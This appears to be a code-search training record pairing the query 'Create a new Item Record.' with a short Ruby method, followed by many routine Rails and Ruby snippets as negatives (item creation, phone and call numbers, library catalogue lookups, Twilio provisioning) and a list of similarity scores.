"def set_calldetail\n @calldetail = Calldetail.find(params[:id])\n end",
"def dial(\n number: nil,\n action: nil,\n method: nil,\n timeout: nil,\n hangup_on_star: nil,\n time_limit: nil,\n caller_id: nil,\n record: nil,\n trim: nil,\n recording_status_callback: nil,\n recording_status_callback_method: nil,\n **keyword_args\n )\n\n dial = Dial.new(\n number: number,\n action: action,\n method: method,\n timeout: timeout,\n hangup_on_star: hangup_on_star,\n time_limit: time_limit,\n caller_id: caller_id,\n record: record,\n trim: trim,\n recording_status_callback: recording_status_callback,\n recording_status_callback_method: recording_status_callback_method,\n **keyword_args\n )\n\n yield(dial) if block_given?\n append(dial)\n end",
"def create\n @ca_lotto_number = CaLottoNumber.new(params[:ca_lotto_number])\n\n respond_to do |format|\n if @ca_lotto_number.save\n format.html { redirect_to @ca_lotto_number, notice: 'Ca lotto number was successfully created.' }\n format.json { render json: @ca_lotto_number, status: :created, location: @ca_lotto_number }\n else\n format.html { render action: \"new\" }\n format.json { render json: @ca_lotto_number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def assign_phone_number\n if !params[:customer].blank? && !params[:call_id].blank?\n call = Radius::Call.find_by_radacctid(params[:call_id].to_i)\n customer = Customer.find_by_name_and_address(params[:customer])\n if !call\n flash[:error] = 'Call not found'\n elsif !customer\n flash[:error] = 'Customer not found'\n else\n customer.phones.add call.caller\n end\n end\n redirect_to :action => :index\n end",
"def read_number\n @db.get_first_value 'SELECT number from crl_number'\n end",
"def call_number_link(holding, cn_value)\n cn = ''\n unless cn_value.nil?\n children = call_number_span\n cn_browse_link = link_to(children.html_safe,\n \"/browse/call_numbers?q=#{CGI.escape(cn_value)}\",\n class: 'browse-cn',\n title: \"Browse: #{cn_value}\",\n 'data-toggle' => 'tooltip',\n 'data-original-title' => \"Browse: #{cn_value}\")\n cn = \"#{holding['call_number']} #{cn_browse_link}\"\n end\n content_tag(:td, cn.html_safe, class: 'holding-call-number')\n end",
"def bib\n self.response = self.class.get(\"#{record_url}?view=full\")\n raise_error_if(\"Error getting bib from Aleph REST APIs.\") {\n (response.parsed_response[\"get_record\"].nil? or response.parsed_response[\"get_record\"][\"record\"].nil?)\n }\n MARC::XMLReader.new(StringIO.new(xml(xml: response.body).at_xpath(\"get-record/record\").to_xml(xml_options).strip)).first\n end",
"def update\n @number_call = NumberCall.find(params[:id])\n\n respond_to do |format|\n if @number_call.update_attributes(params[:number_call])\n format.html { redirect_to @number_call, notice: 'Number call was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @number_call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def corporate_number=(corporate_number)\n\n if !corporate_number.nil? && corporate_number !~ Regexp.new(/^\\\\d{13}$/)\n fail ArgumentError, \"invalid value for 'corporate_number', must conform to the pattern /^\\\\d{13}$/.\"\n end\n\n @corporate_number = corporate_number\n end",
"def write_number(crl_number)\n return nil if @crl_number_file.nil?\n\n write_data(@crl_number_file, crl_number.to_s)\n end",
"def update\n\n if !params[:number][:business_number].blank?\n params[:number][:business_number] = \"+1\"+Phony.normalize(params[:number][:business_number])\n end\n\n if !params[:number][:tracking_number].blank?\n params[:number][:tracking_number] = \"+1\"+Phony.normalize(params[:number][:tracking_number])\n end\n\n respond_to do |format|\n if @number.update(number_params)\n format.html { redirect_to numbers_url, notice: 'Number was successfully updated.' }\n format.json { render :show, status: :ok, location: @number }\n else\n format.html { render :edit }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\n if !params[:number][:business_number].blank?\n params[:number][:business_number] = \"+1\"+Phony.normalize(params[:number][:business_number])\n end\n\n if !params[:number][:tracking_number].blank?\n params[:number][:tracking_number] = \"+1\"+Phony.normalize(params[:number][:tracking_number])\n end\n\n respond_to do |format|\n if @number.update(number_params)\n format.html { redirect_to numbers_url, notice: 'Number was successfully updated.' }\n format.json { render :show, status: :ok, location: @number }\n else\n format.html { render :edit }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @ca_lotto_number = CaLottoNumber.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @ca_lotto_number }\n end\n end",
"def phone_number; end",
"def phone_number; end",
"def new\n @bill = Bill.find(params[:bill_id])\n @billed_call = @bill.billed_calls.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @billed_call }\n end\n end",
"def get_bib(bibnum)\n cbn = clean_bibnum(bibnum)\n if cbn.empty?\n Rails.logger.error \"ERROR: OpacRecordService#get_bib called with invalid bib number #{bibnum}\"\n raise InvalidOpacRecordNumber, 'invalid bib number'\n else\n begin\n response = token.get(\"#{@path}/bibs/#{cbn}\")\n rescue OAuth2::Error => e\n Rails.logger.error \"ERROR: OpacRecordService#get_bib #{e}\"\n raise OpacConnectionError, 'error connecting or authenticating with the opac'\n else\n # It may seem like we should just return the unparsed (json) body, since\n # the controller will pull from here and then need to turn it into json again.\n # But I expect to do lots of data processing here in /services; therefore\n # controller should expect the hash and convert it back to json for consumption.\n response.parsed\n end\n end\n end",
"def make_phone_call(number, international_code = '+254', area_code = 7)\n puts \"calling #{international_code}-#{area_code}#{number}\"\nend",
"def update\n @call_num = CallNum.find(params[:id])\n\n respond_to do |format|\n if @call_num.update_attributes(params[:call_num])\n flash[:success] = 'Call number was successfully updated.'\n format.html { redirect_to add_details_path }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @call_num.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n \t@session_id=session[:id]\n\t@session = Session.find(session[:id])\n\t@person = Person.find(@session.person_id)\n\t@appointment_payment = AppointmentPayment.new(params[:appointment_payment])\n\t@appointment_payment.patient_name=Number.new.change_patient_name(@appointment_payment.patient_name)\n \t\n\t# Get updated receipt/bill no\n\treceipt_no=Number.new # Create object to number table\n\t@appointment_payment.bill_no11=receipt_no.get_number('receipt',@appointment_payment.org_code) \t# Method calling \n\t# end\n respond_to do |format|\n if @appointment_payment.save\n \t@n=Number.find_by_name_and_org_code(\"receipt\",@appointment_payment.org_code)\n\t\t@n.value=@appointment_payment.bill_no11\n\t\t@n.update_attributes(params[:n])\n format.html { redirect_to(\"/appointment_payments/report/#{@appointment_payment.id}?print_type=original&format=pdf\") }\n format.xml { render :xml => @appointment_payment, :status => :created, :location => @appointment_payment }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @appointment_payment.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def show\n @call_num = CallNum.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @call_num }\n end\n end",
"def number\n apartment_information[:number]\n end",
"def initialize(number)\n validate!\n @type_car = :cargo\n @number_car = number\n super(@number_car, @type_car)\n end",
"def cid(cdr)\n if cdr.phone\n number_to_phone(cdr.phone.complete_phone_number, :area_code => true) \n else\n cdr.src\n end \n end",
"def record()\n # Staying in Germany for now:\n country_code = '+49'\n # Between 2 and 5 digits area codes (max 2 + 3):\n area_digits_quantity = 2 + rand(4)\n # Area code has no trailing zeros. E.g. with 4 digits minimum is 1000.\n min_area_code = 10 ** (area_digits_quantity - 1)\n # Biggest 5 digit area code is 99999, i.e. 10**5 - 1\n max_area_code = 10 ** area_digits_quantity - 1\n # Get a random number in the range min_area_code to max_area_code:\n area_code = min_area_code + rand( max_area_code - min_area_code + 1 )\n # Today area code and subscriber line are 10 digits in total.\n subscriber_digits_quantity = 10 - area_digits_quantity\n min_subscriber_number = 10 ** (subscriber_digits_quantity - 1)\n max_subscriber_number = 10 ** subscriber_digits_quantity - 1\n subscriber_number = min_subscriber_number + rand( max_subscriber_number - min_subscriber_number + 1 )\n PhoneNumber.new( country_code, area_code, subscriber_number )\n end",
"def create\n @contact_number = ContactNumber.new(params[:contact_number])\n\n respond_to do |format|\n if @contact_number.save\n flash[:notice] = 'ContactNumber was successfully created.'\n format.html { redirect_to(@contact_number) }\n format.xml { render :xml => @contact_number, :status => :created, :location => @contact_number }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @contact_number.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def number(twilio=false, name=nil, area_code=nil)\n if twilio\n # Check if twilio configuration exists. If not throw and errors because twilio was passed as true.\n if !@config[:configuration][:twilio].blank? and (!@config[:configuration][:twilio][:account_id].blank? and !@config[:configuration][:twilio][:api_key].blank?)\n account = @config[:configuration][:twilio][:account_id]\n key = @config[:configuration][:twilio][:api_key]\n\n # Initialize twilio client.\n twilio = Twilio::REST::Client.new account, key\n\n # If any area code is provide look for local numbers, if not get a toll free.\n if area_code.blank?\n available_numbers = twilio.account.available_phone_numbers.get('US').toll_free.list\n else\n available_numbers = twilio.account.available_phone_numbers.get('US').local.list(area_code: area_code) unless area_code.blank?\n end\n\n # Select the first number available.\n available_number = available_numbers.first\n\n # If available numbers is blank throw an error because something went wrong.\n if available_numbers.blank?\n raise StandardError, \"No Available Numbers\"\n else\n\n # Convert the phone number into something a artificial voice can say.\n phone_number = available_number.phone_number.gsub(\"+1\",\"\")\n phone_number = \"#{phone_number[0..2]}-#{phone_number[3..5]}-#{phone_number[6..10]}\"\n\n\n # Setting the transciption email\n # email = @config[:configuration][:twilio][:transcription_email].blank? ? \"developers%40level.agency\" : @config[:configuration][:twilio][:transcription_email]\n email = \"developers%40level.agency\"\n # Put together the voicemail Twimil.\n voice_message = \"http://twimlets.com/voicemail?Email=#{email}&Message=You%20reached%20the%20voicemail%20box%20of%20#{phone_number}.%20%20Please%20leave%20a%20message%20after%20the%20beep.&Transcribe=true&\"\n\n # Here we buy the number, set the voice_url to the voicemail Twimil and set the\n # sms_url to echo so Twilio will capture the message but not reply to it.\n number = twilio.account.incoming_phone_numbers.create({\n phone_number: available_number.phone_number,\n friendly_name: name,\n voice_url: voice_message,\n voice_method: \"GET\",\n sms_url: \"http://twimlets.com/echo?Twiml=%3CResponse%3E%3C%2FResponse%3E\",\n sms_method: \"GET\"\n })\n\n # If number is blank throw and error because something went wrong.\n if number.blank?\n raise StandardError, \"Unable to allocate Twilio number\"\n else\n number.phone_number\n end\n end\n else\n raise ArgumentError, \"Cannot find Twilio Account ID and API key in configuration\"\n end\n else\n Faker::PhoneNumber.phone_number\n end\n end",
"def destroy\n @call_num = CallNum.find(params[:id])\n @call_num.destroy\n\n respond_to do |format|\n flash[:success] = 'Call number was successfully deleted.'\n format.html { redirect_to add_details_path }\n format.xml { head :ok }\n end\n end",
"def number\n HookNumber.new(number_record)\n end",
"def set_number\n binding.pry\n @number = Number.find(params[:id])\n end",
"def query_ol_api(call_number:)\n conn = Faraday.new(url: \"#{catalog_host}/catalog.json\")\n result = conn.get do |req|\n req.params[\"search_field\"] = \"all_fields\"\n req.params[\"f[call_number_browse_s][]\"] = call_number\n end\n\n json = JSON.parse result.body\n # return nil unless json[\"response\"][\"docs\"].count.positive?\n json[\"response\"][\"docs\"].map { |doc| doc[\"id\"] } # will be [] if no results\n end",
"def marc_record_from_marcxml\n id = fetch(_marc_source_field)\n\n response = Faraday.get(\"#{Requests.config['bibdata_base']}/bibliographic/#{id}\")\n @can_retry = response.status == 429\n response_stream = StringIO.new(response.body)\n marc_reader = ::MARC::XMLReader.new(response_stream)\n marc_records = marc_reader.to_a\n marc_records.first\n end",
"def add(number)\n path_str = \"/api/v1/#{@list_type_path}/#{number.id}/add.json\"\n #puts \"Add to #{@account_id}:#{@source_id} -> #{number.id} -> #{path_str}\"\n # accounts/25 /sources/5012 /numbers\n # /api/v1/accounts/:account_id/sources/:source_id/numbers/:id/add\n res = self.class.post(path_str, :body => {}.merge(:auth_token => @token))\n if res && res['status'] == 'success'\n CTM::Source.new(res['source'], @token)\n else\n puts res.inspect\n raise CTM::Error::Add.new(res[\"reason\"])\n end\n end",
"def get_call_number(item_display)\n get_item_display_piece(item_display, 0)\n end",
"def display_number\n self['display_number'] ||= self.class.mask(number)\n self['display_number']\n end",
"def enter_reference_nbr(test_data)\n hide_notifications_bar\n wait_for_options_and_type(reference_nbr_input, reference_nbr_options, test_data[UseOfCollections::REFERENCE_NBR.name])\n end",
"def delete(cab_number)\n @fleet.release_cab(cab_number, @cab_type)\n return { message: \"Ok\", cab_number: cab_number }\n end",
"def find_by_number(number)\n response = session.request(entity_class.soap_action('FindByNumber')) do\n soap.body = {\n 'number' => number\n }\n end\n\n if response == {}\n nil\n else\n creditor = build\n creditor.partial = true\n creditor.persisted = true\n creditor.handle = response\n creditor.number = response[:number].to_i\n creditor\n end\n end",
"def set_borrow\n @borrow = Borrow.find(params[:id])\n end",
"def show\n @library_contact = @library_location.library_contacts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @library_contact }\n end\n end",
"def make_phone_call(number, international_code = 1, area_code = 646)\n puts \"Calling #{international_code}-#{area_code}-#{number}\"\nend",
"def release_cab(number, cab_type)\n (cab_type == 'pink') ? (cabs = @pink_cabs) : (cabs = @go_cabs)\n\n cabs[number].available = true\n cabs[number].location = cabs[number].user.drop_location\n end",
"def complaints_complaints_with_http_info(phone_number, opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug \"Calling API: ComplaintsApi#complaints_complaints ...\"\n end\n \n # verify the required parameter 'phone_number' is set\n fail \"Missing the required parameter 'phone_number' when calling complaints_complaints\" if phone_number.nil?\n \n # resource path\n local_var_path = \"/api/2015-11-01/Complaints/{phoneNumber}\".sub('{format}','json').sub('{' + 'phoneNumber' + '}', phone_number.to_s)\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n\n # HTTP header 'Accept' (if needed)\n _header_accept = ['application/json', 'text/json', 'application/xml', 'text/xml']\n _header_accept_result = @api_client.select_header_accept(_header_accept) and header_params['Accept'] = _header_accept_result\n\n # HTTP header 'Content-Type'\n _header_content_type = []\n header_params['Content-Type'] = @api_client.select_header_content_type(_header_content_type)\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n \n auth_names = []\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'Complaints')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: ComplaintsApi#complaints_complaints\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def enter_reference_nbr(test_data)\n hide_notifications_bar\n logger.info \"Entering reference number '#{test_data[CoreUseOfCollectionsData::REFERENCE_NBR.name]}'\"\n wait_for_options_and_type(reference_nbr_input, reference_nbr_options, test_data[CoreUseOfCollectionsData::REFERENCE_NBR.name])\n end",
"def reference_credit_note\n object.credit_note_ref.to_s\n end",
"def create\n\t\tapi_response = FaxNumber.provision(provision_number_params[:area_code])\n\t\tif api_response.phone_number\n\t\t\tFaxNumber.create!(fax_number: api_response.phone_number, has_webhook_url: false, org_switched_at: Time.now)\n\t\t\tflash[:notice] = \"Fax number provisioned successfully. Your new number is #{FaxNumber.format_pretty_fax_number(api_response.phone_number)}.\"\n\n\t\t\t# Adds fax number to the organization immediately \n\t\t\tif provision_number_params[:organization_id]\n\t\t\t\tnumber = FaxNumber.find_by(fax_number: api_response.phone_number)\n\t\t\t\tnumber.update_attributes(organization_id: provision_number_params[:organization_id])\n\t\t\t\tredirect_to organization_path(provision_number_params[:organization_id])\n\t\t\telse\n\t\t\t\tredirect_to fax_numbers_path\n\t\t\tend\n\t\telse\n\t\t\tflash[:alert] = \"Something went wrong\"\n\t\t\trender :new\n\t\tend\n\tend",
"def create\n @phone_number = @kontact_information.phone_numbers.build(params[:phone_number])\n respond_to do |format|\n if @phone_number.save\n flash[:notice] = 'Phone number was successfully created.'\n format.html { redirect_to(@phone_number) }\n format.mobile {redirect_to profile_kontact_kontact_information_plural_fields_path(@profile, @kontact)}\n format.xml { render :xml => @phone_number, :status => :created, :location => @phone_number }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @phone_number.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_temp_holdings_for_processing(rec)\n # init_holdings is a hash of the parameters needed to create a\n # HoldingsRecord object.\n # Initially we set the first 4, which come from 999 92s\n init_holdings = {}\n occ = 0\n Traject::MarcExtractor.cached(\"999|92|\").each_matching_line(rec) do |field, spec, extractor|\n id = field['a']\n loc = field['b']\n next if loc.start_with?('e')\n ct = field['c']\n occ = occ += 1\n\n init_holdings[id] = [id, loc, ct, occ]\n end\n\n if init_holdings.length > 0\n # field_hash\n # key = holdings record id\n # value = array of MARC::DataFields created from 999 93s determined to\n # be relevant to subsequent display/processing\n field_hash = {}\n \n Traject::MarcExtractor.cached(\"999|93|\").each_matching_line(rec) do |field, spec, extractor|\n recid = field['0']\n\n df = new_data_field(field) if \n ( field['2'] == '852' && field['3'] == 'c' ) ||\n ( field['2'] =~ /85[345]/ && field['3'] == 'y' ) ||\n ( field['2'] =~ /86./ && field['3'] == 'h' )\n\n if df\n if field_hash.has_key?(recid)\n field_hash[recid] << df\n else\n field_hash[recid] = [df]\n end\n end\n end\n\n # field_hash values are appended to the relevant parameter array of init_holdings\n field_hash.each { |k, v| init_holdings[k] << v if init_holdings[k] }\n\n # create new HoldingsRecord object \n holdings_array = []\n init_holdings.each_value do |hdata|\n # if there are no relevant variable fields, we don't need to output holdings data\n if hdata.size == 5\n holdings_array << HoldingsRecord.new(hdata[0], hdata[1], hdata[2],\n hdata[3], hdata[4]) \n end\n end\n\n # make sure they are in ILS order\n return holdings_array.sort_by { |h| h.occ }\n end\n end",
"def create\n @call = Call.new(params[:call])\n \n respond_to do |format|\n if @call.save\n \n result = OutgoingCallerId.find(:last)\n twcall = @twilio_client.account.calls.create(\n from: result.phone_number,\n to: @call.to, \n url: \"#{url_for(@call)}/twiml.xml\")\n \n @call.update_attribute :sid, twcall.sid\n format.html { redirect_to @call, notice: \"Call was successfully created.#{url_for(@call)}\" }\n format.json { render json: @call, status: :created, location: @call }\n else\n format.html { render action: \"new\" }\n format.json { render json: @call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def book(params)\n rate_plan = price_handler.best_rate_plan(params)\n\n return rate_plan unless rate_plan.success?\n\n u_id = JTB::UnitId.from_roomorama_unit_id(params[:unit_id])\n\n message = builder.build_booking(params, rate_plan.value, u_id.room_type_code)\n result = remote_call(message)\n return result unless result.success?\n\n result = response_parser.parse_booking(result.value)\n return result unless result.success?\n\n reference_number = ReferenceNumber.from_jtb_ids(result.value, rate_plan.value.rate_plan)\n\n Result.new(reference_number.reference_number)\n end",
"def create\n @insurance_master = InsuranceMaster.new(params[:insurance_master])\n\t\n\t@cde=InsuranceMaster.last(:conditions =>\"org_code='#{@insurance_master.org_code}'\")\n\tif(@cde)\n\t\t@t_no=(@cde.code.to_i+1).to_s\n\telse\n\t\t@t_no=\"666000\"\n\tend\n if(params[:call_from])\n @call_from=\"registrations\"\n else\n @call_from=\"new\"\n end\n\t@insurance_master.code=@t_no\n\t\n respond_to do |format|\n if @insurance_master.save\n format.html { redirect_to(\"/insurance_masters/show/#{@insurance_master.id}?call_from=#{@call_from}\", :notice => 'InsuranceMaster was successfully created.') }\n format.xml { render :xml => @insurance_master, :status => :created, :location => @insurance_master }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @insurance_master.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def rebuild_competitors(bib_numbers)\n clear_competitors\n build_competitors(bib_numbers)\n end",
"def create_cdrs(account_number, cdrs_form)\r\n # the base uri for api requests\r\n query_builder = Configuration.base_uri.dup\r\n\r\n # prepare query string for API call\r\n query_builder << '/accounts/{account_number}/cdrs'\r\n\r\n # process optional query parameters\r\n query_builder = APIHelper.append_url_with_template_parameters query_builder, {\r\n 'account_number' => account_number\r\n }\r\n\r\n # validate and preprocess url\r\n query_url = APIHelper.clean_url query_builder\r\n\r\n # prepare headers\r\n headers = {\r\n 'user-agent' => 'APIMATIC 2.0',\r\n 'accept' => 'application/json',\r\n 'content-type' => 'application/json; charset=utf-8',\r\n 'X-Auth-Token' => Configuration.x_auth_token\r\n }\r\n\r\n # invoke the API call request to fetch the response\r\n response = Unirest.post query_url, headers: headers, parameters: cdrs_form.to_json\r\n\r\n # Error handling using HTTP status codes\r\n if response.code == 401\r\n raise APIException.new 'You are not authenticated', 401, response.raw_body\r\n elsif response.code == 403\r\n raise APIException.new 'This action needs a valid WSSE header', 403, response.raw_body\r\n elsif response.code == 404\r\n raise APIException.new 'Resource not found', 404, response.raw_body\r\n elsif response.code == 400\r\n raise APIException.new 'Http bad request', 400, response.raw_body\r\n elsif !response.code.between?(200, 206) # [200,206] = HTTP OK\r\n raise APIException.new 'HTTP Response Not OK', response.code, response.raw_body\r\n end\r\n\r\n response.body\r\n end",
"def initialize(id, loc, ct, occ, fields)\n @id = id\n @loc = loc\n @card_ct = ct\n @occ = occ\n @fields = fields.freeze\n @call_numbers = []\n @notes = []\n @patterns = {}\n @enums_and_chrons = {}\n @summary_holding = []\n @summary_holding_supplement = []\n @summary_holding_index = []\n end",
"def new\n\t@session_id=session[:id]\n\t@session = Session.find(session[:id])\n\t@person = Person.find(@session.person_id)\n\t@org_code=@person.org_code\n\t@org_location=@person.org_location\n \t@test_booking = TestBooking.new\n \n\t@item_master=ChargeMaster.all(:conditions => \"org_code = '#{@org_code}'\")\n\n\t10.times{ @test_booking.test_booking_child.build }\n\tstr=\"\"\n\tstr1=\"\"\n\t@barcode_id=\"\"\n\t@tb=TestBooking.last(:conditions =>\"org_code='#{@org_code}'\")\n \tif(@tb)\n\t\tn=(@tb.lab_no.slice!(3..50).to_i+1).to_s \n\t\t@barcode_id=@tb.barcode_id.next\t\n \tstr=\"Lab\"+n\n\telse\n n=1.to_s\n @barcode_id=\"201208001\"\n\t\tstr=\"Lab\"+n\n\tend\n\t@test_booking.lab_no=str\n\treceipt_no=Number.new\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Create object to number table\n\t@test_booking.bill_no=receipt_no.get_number('receipt',@org_code) \t# Method calling \n\t\n\t# end\n\t\n\t@appt_payment = AppointmentPayment.all(:conditions => \"appt_date = '#{Date.today}'\")\n\t@admissions = Admission.all(:conditions => \"admn_status = 'admitted'\", :order => \"id DESC\")\n\t@registration=Registration.all(:order => \"id DESC\")\n\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @test_booking }\n end\n end"
] |
[
"0.5754502",
"0.5726902",
"0.5719064",
"0.564893",
"0.5638431",
"0.55748886",
"0.55748886",
"0.55579716",
"0.5534168",
"0.55070084",
"0.5491602",
"0.5445457",
"0.53901386",
"0.5379921",
"0.53433573",
"0.53317064",
"0.5296885",
"0.5295421",
"0.5294268",
"0.5220695",
"0.5185369",
"0.5176848",
"0.51733005",
"0.5152954",
"0.51469994",
"0.5129037",
"0.5126479",
"0.511186",
"0.5054201",
"0.5040991",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.503538",
"0.5026519",
"0.50244206",
"0.50217956",
"0.5010081",
"0.4987174",
"0.49821746",
"0.49733624",
"0.49658653",
"0.4961315",
"0.495585",
"0.49466679",
"0.49397948",
"0.4924017",
"0.48956603",
"0.48950276",
"0.4885316",
"0.48727703",
"0.48677582",
"0.48499888",
"0.48424244",
"0.48396075",
"0.48396075",
"0.48162067",
"0.48157698",
"0.48157698",
"0.4811284",
"0.48098585",
"0.48071185",
"0.4806867",
"0.47939676",
"0.47926384",
"0.4790437",
"0.47753513",
"0.47724414",
"0.47705007",
"0.47625116",
"0.4755167",
"0.4751795",
"0.47376943",
"0.4736855",
"0.47350824",
"0.4717592",
"0.47026786",
"0.4700121",
"0.4695872",
"0.46945006",
"0.4692426",
"0.46919665",
"0.46907082",
"0.4688148",
"0.4687602",
"0.4669447",
"0.46664327",
"0.46632606",
"0.46631226",
"0.46575433",
"0.4657339",
"0.46551734",
"0.46536365",
"0.46504885",
"0.46503446",
"0.46476504",
"0.46468574",
"0.46440986",
"0.46422833"
] |
0.0
|
-1
|
Create a new Item Record.
|
def new_item(opts={})
defaults = {:number => @items.count + 1}
@items << ItemRecord.new(defaults.merge(opts))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n \n #debug\n write_log(\n Const::SL::LOG_PATH_SL,\n \"items_controller#create(params[:item] => #{params[:item]})\",\n # __FILE__,\n __FILE__.split(\"/\")[-1],\n __LINE__.to_s)\n\n \n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(params = {})\n item = build(params)\n item.save\n item\n end",
"def createItem(title, description, date)\n new_item = List.new\n new_item.title = title\n new_item.description = description\n new_item.save\n new_item.date = date\n end",
"def create(attributes)\n response = JSON.parse(@client.post('items', attributes).body)\n Promisepay::Item.new(@client, response['items'])\n end",
"def create_item(name, price)\r\n new_item = Models::Item.created( name, price, self )\r\n self.item_list.push(new_item)\r\n new_item.save\r\n return new_item\r\n end",
"def create_item(data)\n fail 'Base class does not include ::Record!' if @base && !@base.include?(::Record)\n item = (@base || Record).new\n item.data = data\n item\n end",
"def create\n item = list.items.create!(item_params)\n render json: item, status: 201\n end",
"def new\n @item = Item.new\n end",
"def create_item(item_request_body, opts = {})\n data, _status_code, _headers = create_item_with_http_info(item_request_body, opts)\n data\n end",
"def create\n\t\titem = Item.create(item_params)\n\t\trender json: item\n\tend",
"def new_item(content)\n Item.new(:project_id => @project_id, :content => content)\n end",
"def new\n \t@item=Item.new({:ItemName =>'def'})\n end",
"def create\n __log_activity\n __debug_route\n @item = create_record(no_raise: true)\n errors = @item&.errors || 'Not created' # TODO: I18n\n user_authorize!\n respond_to do |format|\n if errors.blank?\n format.html { redirect_success(__method__) }\n format.json { render :show, location: @item, status: :created }\n else\n format.html { redirect_failure(__method__, error: errors) }\n format.json { render json: errors, status: :unprocessable_entity }\n end\n end\n rescue Record::SubmitError => error\n post_response(:conflict, error)\n rescue => error\n post_response(error)\n end",
"def create_item\n @item = Fox_Item.new(self, @content.join(\"\\t\"), @icon, @icon)\n end",
"def create\n\t \t@item = Item.new(item_params)\n\t \tif @item.save\n\t \t\tredirect_to items_path\n\t \telse\n\t \t\trender action: \"new\"\n\t \tend\n\t end",
"def new\n @item = Item.new\n end",
"def new\n @item = Item.new\n end",
"def new\n @item = Item.new\n end",
"def create_item(item_code)\n \t\txero = XeroConnection.new.connect\n\n \t\tif xero.Item.all(where: 'code == \"%s\"' % item_code).empty?\n \t\t\tnew_item = xero.Item.build(code: item_code)\n \t\t\tnew_item.save\n \t\tend\n \tend",
"def create\n @item = @list.items.build(item_params)\n @item.user = current_user\n\n if @item.save\n return success_item_create\n else\n return error_item_save\n end\n end",
"def create\n # defined object to receive strict item_params including :description, :price, :stockQty ; else return 400\n @item = Item.new(item_params)\n \n if @item.save\n render json: @item.to_json, status: 201\n else\n head 400\n end\n end",
"def create_item(user_id, data) \n data = data.just(SETTABLE_ITEM_FIELDS)\n data[:user_id] = user_id\n data[:title] ||= 'item'\n data[:price] ||= 5\n data[:price] = data[:price].to_i\n data[:slug] = get_unique_slug($items,:slug,data[:title])\n\n data[:imgs] = data[:imgs].to_a.map {|link| {link: link}}\n data[:videos] = data[:videos].to_a.map {|link| {link: link}}\n data[:status] = :pending\n item = $items.add(data)\nend",
"def create\r\n @item = Item.new(params[:item])\r\n if @item.save\r\n redirect_to @item, notice: 'Item was successfully created.'\r\n else\r\n render action: \"new\"\r\n end\r\n end",
"def create\n @item = Item.new(item_params)\n @item.save\n redirect_to @item\n end",
"def create\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_save_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n \n if @item.save\n redirect_to @item\n else\n render :new\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
